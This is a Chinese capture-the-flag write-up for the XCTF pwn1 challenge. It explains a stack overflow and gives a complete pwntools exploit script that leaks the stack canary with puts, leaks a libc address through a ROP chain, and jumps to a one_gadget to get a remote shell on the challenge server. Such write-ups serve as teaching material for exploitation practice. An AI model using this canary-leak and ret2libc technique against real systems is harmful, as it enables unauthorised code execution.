[攻防世界]进阶区pwn1

这个题除了PIE基本都开了，可能是要绕过canary或者泄露canary再栈溢出
运行程序发现选1是写入，选2是输出，选3是退出

IDA打开静态分析一波

发现没有system和/bin/sh，但是有write和puts，并且题目附件给了个libc，所以应该是要用write或puts泄露自身地址，计算system的真实地址

这个程序的主体部分都在main函数里

read这里有一个明显的栈溢出，字符串s定义的长度只有0x90，但是read了0x100
看栈结构可知，canary( 即图中var_8 )值位于s下方

低地址会向高地址溢出，并且程序里有puts
canary的值前两位是\x00，而puts遇到\x00就会停止输出，所以要用s溢出覆盖掉canary的前两位，然后输入1让puts输出canary的值，拿到canary值以后就可以为所欲为的栈溢出了，想去哪就去哪

我的思路：

1. 选1，让s溢出至canary
2. 选2，让puts把连着的canary也输出出来
3. 接收canary值，选1，覆盖返回地址到write或puts (puts更简单点，只用传一个参) ，计算libc基地址
4. 计算system和/bin/sh实际地址
5. 选1，return到system构造system(“/bin/sh”)，拿到shell

但是发现这么做不行，报错

于是乎去看了看别的大佬的wp，好像是服务器里没有sh，所以没法用/bin/sh，需要用一段one_gadget
，调用execve(“/bin/sh”)来拿到shell，就是说不用计算system和/bin/sh的地址，只用计算one_gadget的地址，跳转过去即可

EXP：

from pwn import *

elf=ELF('./pwn1')
libc=ELF('./libc-2.23.so')
prdi_addr=0x0400a93
main_addr=0x0400908
one_gadget_addr=0x45216
put_plt=elf.plt['puts']
put_got=elf.got['puts']

p=remote('111.198.29.45',57833)
p.sendlineafter('>> ','1')
p.sendline('a'*0x88)
p.sendlineafter('>> ','2')
p.recvuntil('a'*0x88+'\n') #这是之前让s溢出的一堆字符串
canary=u64(p.recv(7).rjust(8,'\x00')) #接收完之前填充的字符串，最后几位才是canary，补上覆盖掉的\x00
print hex(canary)

p.sendlineafter('>> ','1')
payload='a'*0x88+p64(canary)+'a'*8+p64(prdi_addr)+p64(put_got)+p64(put_plt)+p64(main_addr) #8个a是覆盖ebp的
p.sendline(payload)
p.recv()
p.sendlineafter('>> ','3')
put_addr=u64(p.recv(8).ljust(8,'\x00')) #拿到put真实地址
print hex(put_addr)

libc_base=put_addr-libc.symbols['puts'] #算libc基地址
flag=libc_base+one_gadget_addr #算one_gadget真实地址

p.sendlineafter('>> ','1')
payload1='a'*0x88+p64(canary)+'a'*8+p64(flag) #覆盖返回地址到one_gadget
p.sendline(payload1)
p.sendlineafter('>> ','3')
p.interactive()

参考：https://bbs.pediy.com/thread-254373.htm

赏

好活儿，当赏！

微信